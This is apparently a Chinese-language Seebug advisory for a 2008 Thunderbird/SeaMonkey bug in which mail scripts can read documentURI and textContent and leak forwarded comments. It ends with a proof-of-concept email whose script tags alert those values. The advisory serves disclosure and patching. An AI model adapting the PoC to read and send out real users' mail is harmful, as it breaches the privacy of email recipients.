Thunderbird和SeaMonkey mailnews信息泄露漏洞

2008-11-21T00:00:00
ID SSV:4475
Type seebug
Reporter Root
Modified 2008-11-21T00:00:00

Description

BUGTRAQ ID: 32363

Thunderbird和SeaMonkey是Mozilla所发布的邮件和新闻组客户端。

Thunderbird和SeaMonkey允许JavaScript访问.documentURI和.textContent DOM属性,这可能导致泄露邮件消息中的敏感信息。

如果收件人在邮件中允许JavaScript的话,则将恶意邮件转发给该收件人的时候,邮件消息中的脚本就可以访问转发者所添加的评注;如果该邮件消息还允许加载远程内容的话,就可能将所访问到的信息泄露给原始作者。

Mozilla Thunderbird < 2.0.0.18 Mozilla SeaMonkey < 1.1.13 Mozilla


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://www.seamonkey-project.org/releases/ target=_blank>http://www.seamonkey-project.org/releases/</a> <a href=http://www.mozilla.com/en-US/thunderbird/all.html target=_blank>http://www.mozilla.com/en-US/thunderbird/all.html</a>

                                        
                                            
                                                From - Tue Oct  7 08:54:27 2008
X-Account-Key: account2
X-UIDL: GmailId11cd803cbe0c86f7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:                                                                                 
Delivered-To: foo@example.com
Received: by 10.150.220.5 with SMTP id s5cs123290ybg;
        Tue, 7 Oct 2008 08:54:00 -0700 (PDT)
Received: by 10.142.222.4 with SMTP id u4mr2778995wfg.250.1223394839776;
        Tue, 07 Oct 2008 08:53:59 -0700 (PDT)
Return-Path: &lt;bar@example.com&gt;
Message-ID: &lt;48EB8614.50102@example.com&gt;
Date: Tue, 07 Oct 2008 08:53:56 -0700
From: Bar &lt;bar@example.com&gt;
User-Agent: Thunderbird 2.0.0.15pre (Macintosh/20080511)
MIME-Version: 1.0
To: Foo &lt;foo@example.com&gt;
Subject: Alert documentURI
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit

&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;&gt;
&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body bgcolor=&quot;#ffffff&quot; text=&quot;#000000&quot;&gt;
&lt;p&gt;Don't forget to enable javascript.allow.mailnews and View - Message Body As - 
Original HTML&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;&amp;lt;script&amp;gt;alert(document.documentURI);&amp;lt;/script&amp;gt;&lt;/li&gt;
  &lt;li&gt;&amp;lt;script&amp;gt;alert(document.getElementsByTagName(&quot;body&quot;)[0].textContent);&amp;lt;/script&amp;gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;script&gt;alert(&quot;document.documentURI:\n&quot; + document.documentURI);&lt;/script&gt;
&lt;script&gt;alert(document.getElementsByTagName(&quot;body&quot;)[0].textContent);&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;